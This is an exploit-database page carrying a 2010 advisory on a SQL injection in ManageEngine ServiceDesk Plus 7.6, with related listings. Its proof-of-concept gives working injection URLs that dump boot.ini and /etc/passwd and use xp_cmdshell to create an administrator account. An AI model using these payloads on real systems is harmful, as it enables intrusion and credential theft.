Menu

Search for hundreds of thousands of exploits

"ManageEngine ServiceDesk Plus 7.6 - woID SQL Injection"

Author

Exploit author

"Nahuel Grisolia"

Platform

Exploit platform

jsp

Release date

Exploit published date

2010-03-18

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
Advisory Name: SQL injection in Manage Engine Service Desk Plus 7.6
Vulnerability Class: SQL injection
Release Date: 03-18-2010
Affected Applications: Confirmed in version 7.6. Other versions may also be affected.
Affected Platforms: Multiple
Local / Remote: Remote
Severity: High  CVSS: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Researcher: Nahuel Grisolía
Vendor Status: Acknowledged. Not fixed.

Vulnerability Description:
A Vulnerability has been discovered in Manage Engine Service Desk Plus, which can be exploited by
malicious people to conduct SQL injection attacks.
Input passed via the "woID" parameter to WorkOrder.do is not properly sanitized before being used in
a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The vulnerability is confirmed in version 7.6. Other versions may also be affected.


Proof of Concept:
Microsoft Windows Environment with MySQL:
http://x.x.x.x:8080/WorkOrder.do?woMode=viewWO&woID=WorkOrder.WORKORDERID=6)
union select 1,2,3,4,5,6,7,8,load_file("c:\\boot.ini"),10,11,12,13,14,15,16,17,18,19,1 into dumpfile
'C:\\ManageEngine\\ServiceDesk\\applications\\extracted\\AdventNetServiceDesk.eear\\AdventNetSer
viceDeskWC.ear\\AdventNetServiceDesk.war\\images\\boot.ini'/*
then browse, http://x.x.x.x:8080/images/boot.ini

Microsoft Windows Environment with MSSQL:
http://x.x.x.x:8080/WorkOrder.do?woMode=viewWO&woID=1); EXEC xp_cmdshell 'net user
moebius m03biu5inj3ct$ /add';--
http://x.x.x.x:8080/WorkOrder.do?woMode=viewWO&woID=1); EXEC xp_cmdshell 'net localgroup
administrators moebius /add';--

GNU/Linux with MySQL:
http://x.x.x.x:8080/WorkOrder.do?woMode=viewWO&woID=1%29%20union%20select%201,2,3,4,5,
6,7,8,load_file%28%27/etc/passwd%27%29,10,11,12,13,14,15,16,17,18,19,20%20into%20dumpfile%
20%27/home/moebius/ManageEngine/ServiceDesk/applications/extracted/AdventNetServiceDesk.eear
/AdventNetServiceDeskWC.ear/AdventNetServiceDesk.war/images/passwd.txt%27/*
then browse, http://x.x.x.x:8080/images/passwd.txt


Impact: Execute arbitrary SQL queries.
Solution: Not fixed.
Vendor Response:
First contact on January 12, 2010. Last contact on March 15, 2010. They wont fix this issue in the upcoming hotfix. I consider that 2 months is a really long time to fix this kind of High priority issue.
The vendor knows that this advisory will be released. No more contact since then.


Contact Information: 
For more information regarding the vulnerability feel free to contact the researcher at nahuel.grisolia <at> gmail <dot> com
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2012-11-26 "Websense Proxy - Filter Bypass" dos multiple "Nahuel Grisolia"
2012-04-09 "Dolibarr ERP/CRM < 3.2.0 / < 3.1.1 - OS Command Injection" webapps php "Nahuel Grisolia"
2010-12-09 "VMware Tools - Update OS Command Injection" remote multiple "Nahuel Grisolia"
2010-10-13 "Oracle Virtual Server Agent - Command Injection" remote unix "Nahuel Grisolia"
2010-05-19 "McAfee Email Gateway - Web Administration Broken Access Control" webapps freebsd "Nahuel Grisolia"
2010-05-19 "McAfee Email Gateway 6.7.1 - 'systemWebAdminConfig.do' Remote Security Bypass" remote windows "Nahuel Grisolia"
2010-04-22 "Cacti 0.8.7e - SQL Injection" webapps php "Nahuel Grisolia"
2010-04-22 "Cacti 0.8.7e - OS Command Injection" webapps php "Nahuel Grisolia"
2010-04-06 "McAfee Email Gateway (formerly IronMail) - Denial of Service" dos hardware "Nahuel Grisolia"
2010-04-06 "McAfee Email Gateway (formerly IronMail) - Cross-Site Scripting" webapps hardware "Nahuel Grisolia"
2010-04-06 "McAfee Email Gateway (formerly IronMail) - Local Privilege Escalation" local freebsd "Nahuel Grisolia"
2010-04-06 "McAfee Email Gateway (formerly IronMail) - Internal Information Disclosure" local freebsd "Nahuel Grisolia"
2010-04-06 "McAfee Email Gateway < 6.7.2 Hotfix 2 - Multiple Vulnerabilities" dos windows "Nahuel Grisolia"
2010-03-18 "ManageEngine ServiceDesk Plus 7.6 - woID SQL Injection" webapps jsp "Nahuel Grisolia"
2010-03-16 "OSSIM 2.2 - Multiple Vulnerabilities" webapps php "Nahuel Grisolia"
2010-03-16 "eGroupWare 1.6.002 and eGroupWare premium line 9.1 - Multiple Vulnerabilities" webapps php "Nahuel Grisolia"
2010-03-02 "IBM Lotus Domino 7.0.2 - 'readme.nsf' Cross-Site Scripting" remote multiple "Nahuel Grisolia"
2010-02-09 "osTicket 1.6 RC5 - Multiple Vulnerabilities" webapps php "Nahuel Grisolia"
2010-02-04 "KnowGate hipergate 4.0.12 - Multiple Cross-Site Scripting Vulnerabilities" webapps jsp "Nahuel Grisolia"
2010-02-03 "Hipergate 4.0.12 - Multiple Vulnerabilities" webapps jsp "Nahuel Grisolia"
2009-12-16 "OSSIM 2.1.5 - SQL Injection" webapps php "Nahuel Grisolia"
2009-12-16 "OSSIM 2.1.5 - Arbitrary File Upload" webapps php "Nahuel Grisolia"
2009-12-16 "OSSIM 2.1.5 - Remote Command Execution" webapps php "Nahuel Grisolia"
2009-12-04 "Achievo 1.4.2 - Arbitrary File Upload" webapps php "Nahuel Grisolia"
2009-12-04 "Achievo 1.4.2 - Persistent Cross-Site Scripting" webapps php "Nahuel Grisolia"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.